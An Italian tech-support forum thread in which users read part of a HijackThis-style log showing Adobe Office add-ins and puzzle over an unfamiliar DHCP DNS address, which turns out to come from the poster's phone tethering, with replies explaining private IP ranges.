O26 - Office Addin: HKLM\..\PDFMaker.OfficeAddin - (no name) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Office\x64\PDFMOfficeAddin.dll (sign: 'Adobe Inc.')
O26-32 - Office Addin: HKLM\..\AdobeAcroOutlook.SendAsLink - (Adobe Document Cloud for Microsoft Outlook - Acrobat) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Mail\Outlook\SendAsLinkAddin.dll (sign: 'Adobe Inc.')
O26-32 - Office Addin: HKLM\..\PDFMaker.OfficeAddin - (no name) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Office\PDFMOfficeAddin.dll (sign: 'Adobe Inc.')


--
End of file - Time spent: 25,7 sec. - 71690 bytes, CRC32: FFFFFFFF. Sign: 熵⢇

 

[VIANELLO_85]

Sperando di non aver perso niente per strada, questo ip dns non capisco da dove salti fuori

O17 - DHCP DNS 1: 10.158.61.94

 

[scarfacecik84]

Sperando di non aver perso niente per strada, questo ip dns non capisco da dove salti fuori

O17 - DHCP DNS 1: 10.158.61.94

è un problema? come posso risolvere? grazie

ho fatto un altro controllo:
O17 - DHCP DNS 1: 192.168.43.1

 

[VIANELLO_85]

Basta selezionarlo e toglierlo.

 

[scarfacecik84]

Basta selezionarlo e toglierlo.

ho fatto fixchecked ma riavviando il controllo ricompare

 

[VIANELLO_85]

ora è ok.
Quell'ip è il tuo locale dato dal tuo router.
E' corretto che sia 192.168.x.x
E non quello precedente 10.158.x.x

 

[scarfacecik84]

ora è ok.
Quell'ip è il tuo locale dato dal tuo router.
E' corretto che sia 192.168.x.x
E non quello precedente 10.158.x.x

scusa l'ignoranza quel precedente ip a cosa poteva essere dovuto? mi consigli qualche scansione del pc particolare?

 

[VIANELLO_85]

Una scansione antivirus non fa mai male a prescindere.
E' già una buona cosa comunque che ti abbia proposto un ip classico (192.168) e non quell'altro.

 

[scarfacecik84]

Una scansione antivirus non fa mai male a prescindere.
E' già una buona cosa comunque che ti abbia proposto un ip classico (192.168) e non quell'altro.

già fatta una scansione completa con windows defender dove non risulta nulla

 

[scarfacecik84]

Sperando di non aver perso niente per strada, questo ip dns non capisco da dove salti fuori

O17 - DHCP DNS 1: 10.158.61.94

mi era venuto un dubbio mi sono collegato col cellulare che uso come connessione dati e mi è ricomparso

 

[VIANELLO_85]

Ok, allora hai svelato tu stesso l'arcano.
Visto che cercando in internet quella classe ip usciva 'privato' quindi non riuscivo a capire chi appartenesse.
Come classi ip private conosco, appunto, la 192.168.x.x. o in altri casi 10.151.x.x

 

[ataru1976]

Gli IP privati (detti non routable) sono 10.x.x.x, 192.168.x.x e da 172.16.x.x a 172.31.x.x

 

[ERCOLINO]

Esattamente